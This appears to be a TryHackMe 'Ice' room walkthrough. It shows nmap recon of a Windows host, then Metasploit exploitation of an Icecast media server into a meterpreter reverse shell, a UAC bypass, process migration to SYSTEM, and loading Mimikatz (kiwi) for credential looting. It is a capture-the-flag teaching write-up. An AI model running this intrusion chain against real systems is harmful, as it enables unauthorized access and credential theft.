Ice
Deploy & hack into a Windows machine, exploiting a very poorly secured media server.
Windows CVERoom Description
Deploy & hack into a Windows machine, exploiting a very poorly secured media server. Find THM room here
Used Commands & Scripts
Scripts
post/multi/recon/local_exploit_suggester exploit/windows/local/bypassuac_eventvwr post/windows/manage/enable_rdp
Commands
sudo nmap -A -sS -oN logfile.txt -vv <target ip>
run post/multi/recon/local_exploit_suggester
Recon
Start enumaration with nmap sudo nmap -A -sS -oN logfile.txt -vv <target ip>
Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-15 05:27 EDT
[...]
Not shown: 988 closed ports
Reason: 988 resets
PORT STATE SERVICE REASON VERSION
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
445/tcp open microsoft-ds syn-ack ttl 127 Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
3389/tcp open tcpwrapped syn-ack ttl 127
[...]
8000/tcp open http syn-ack ttl 127 Icecast streaming media server
49152/tcp open unknown syn-ack ttl 127
49153/tcp open unknown syn-ack ttl 127
49154/tcp open unknown syn-ack ttl 127
49158/tcp open unknown syn-ack ttl 127
49159/tcp open unknown syn-ack ttl 127
49160/tcp open unknown syn-ack ttl 127
[...]
Service Info: Host: DARK-PC; OS: Windows; CPE: cpe:/o:microsoft:windows
[...]
Read the log and you should find the following information:
- the port Microsoft Remote Desktop is running on
- the name of the service running on port 8000
- the hostname of the machine
Gain Access
Search an existing exploit on one of the exploit databases.
I used exploit-db and searched for icecast
.
![](https://www.xuptox.org/docs/tryhackme/ice/thm_ice_cve_icecast.png)
Find multiple records but only two of them referring to remote code execution. If you look closely both referring the same CVE. Use cvedetails and use the first result for further investigation.
![](https://www.xuptox.org/docs/tryhackme/ice/thm_ice_cve_details.png)
If you find a page showing a CVSS Score of 7.5
you are on the right page. Search for Vulnerability Type(s)
.
Metasploit
Open a new terminal and start msfconsole
. Search for icecast using search icecast
. What’s the full path of the exploit?
Follow the instructions of the room.
Use the exploit: use 0
Check the options: options
And set the missing parameters: set RHOSTS <target ip>
Finally, check the options again and make sure the parameters are set correctly. Then run the exploit with exploit
.
![](https://www.xuptox.org/docs/tryhackme/ice/thm_ice_reverse_shell.png)
If everything went well you should end up with an opened meterpreter shell.
Escalate
Now, what should we do next? No idea? run post/multi/recon/local_exploit_suggester
in the current session. The result is a list of exploits the target seems to be vulnerable to.
![](https://www.xuptox.org/docs/tryhackme/ice/thm_ice_post_exploit_suggester.png)
To use one of the suggested exploits you first need to send the current meterpreter shell to the background by writing background
or pressing CTRL-Z
. I used CTRL-Z
.
![](https://www.xuptox.org/docs/tryhackme/ice/thm_ice_background_shell.png)
Write down the path for the first exploit and use that exploit with:
use exploit/windows/local/bypassuac_eventvwr
Check the options again and set the parameters:
options
set SESSION 1
(usually this should be 1 but can vary)
set LHOST <attacker ip>
exploit
![](https://www.xuptox.org/docs/tryhackme/ice/thm_ice_exploit_bypassuac.png)
Continue with the room.
Looting
I find the Looting section on that room to be explained pretty simply. This is the reason why I’ll keep it compact.
Show all processes with ps
and find the described process name. The process you are searching for contains one of the words printer spool
service.
meterpreter > ps
Process List
============
PID PPID Name Arch Session User Path
--- ---- ---- ---- ------- ---- ----
0 0 [System Process]
4 0 System x64 0
416 4 smss.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\smss.exe
604 584 csrss.exe x64 1 NT AUTHORITY\SYSTEM C:\Windows\System32\csrss.exe
652 584 winlogon.exe x64 1 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
[...]
1316 1016 dwm.exe x64 1 Dark-PC\Dark C:\Windows\System32\dwm.exe
1328 1304 explorer.exe x64 1 Dark-PC\Dark C:\Windows\explorer.exe
1368 692 spoolsv.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\spoolsv.exe
[...]
Migrate to this process using migrate <process id>
. You can find the process id in the column PID
.
The migration process was successful when you gained higher permissions. Check this with getuid
in the newly created meterpreter session.
Continue with Mimikatz.
Load Mimikatz with load kiwi
and open the help menu with help
.
Kiwi Commands
is added to the help menu as part of the loading process.
Run the commands, play around and answer the questions.
Post-Exploitation
Use the help menu to answer the questions.